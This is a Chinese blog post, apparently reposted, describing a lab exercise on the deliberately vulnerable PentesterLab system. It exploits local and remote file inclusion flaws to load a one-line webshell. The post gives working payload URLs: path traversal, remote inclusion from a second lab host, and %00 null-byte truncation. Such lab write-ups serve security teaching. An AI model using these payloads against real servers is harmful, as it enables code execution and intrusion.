pentester系统文件包含漏洞实验

Posted ynydk

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pentester系统文件包含漏洞实验相关的知识,希望对你有一定的参考价值。

关于pentester系统的下载和安装可进入右边的链接进行学习——

 

 

 

 

 

  下面实验开始。

(1)example1本地文件包含漏洞

  (a)/home/user/目录下新建muma.txt文件,并写入一句话木马:

     技术图片

  (b)在浏览器中输入url

    http://192.168.227.148/fileincl/example1.php?page=../../../../../../../../home/user/muma.txt

 

     技术图片

 

 

 

(2)Example1远程文件包含漏洞

    同上,将路径名换成url:

    http://192.168.227.148/fileincl/example2.php?page=http://192.168.227.147/muma.txt

   技术图片

 

 

   

3example2本地文件包含漏洞

  (a)直接输入url

   技术图片

 

 

 

  报错!

  (b)按照错误信息找到产生漏洞的php文件:

   技术图片

 

 

 

  发现在我们输入的文件名后增加了php后缀,那么就要采取截断。

  (c)输入url

  http://192.168.227.148/fileincl/example2.php?page=../../../../../../home/user/muma.txt%00

   技术图片

 

 

 

4Example2远程文件包含漏洞

  (a)直接输入url

  http://192.168.227.148/fileincl/example2.php?page=http://192.168.227.147/muma.txt

   技术图片

 

 

 

  报错!

  (b)按照错误信息找到产生漏洞的php文件:

   技术图片

 

 

 

  发现在我们输入的文件名后增加了php后缀,那么就要采取截断。

  (c)输入url

  http://192.168.227.148/fileincl/example2.php?page=http://192.168.227.147/muma.txt%00

   技术图片

 

 

2020-03-08 18:21:03

 

 

 

以上是关于pentester系统文件包含漏洞实验的主要内容,如果未能解决你的问题,请参考以下文章

ThinkPHP文件包含漏洞分析

Web安全技术 实验报告四 文件包含与上传

干货 |GitHUB安全搬运工 Ⅱ

文件包含漏洞

通达OA 任意文件上传+文件包含导致RCE漏洞复现

Pikachu靶场之文件包含漏洞详解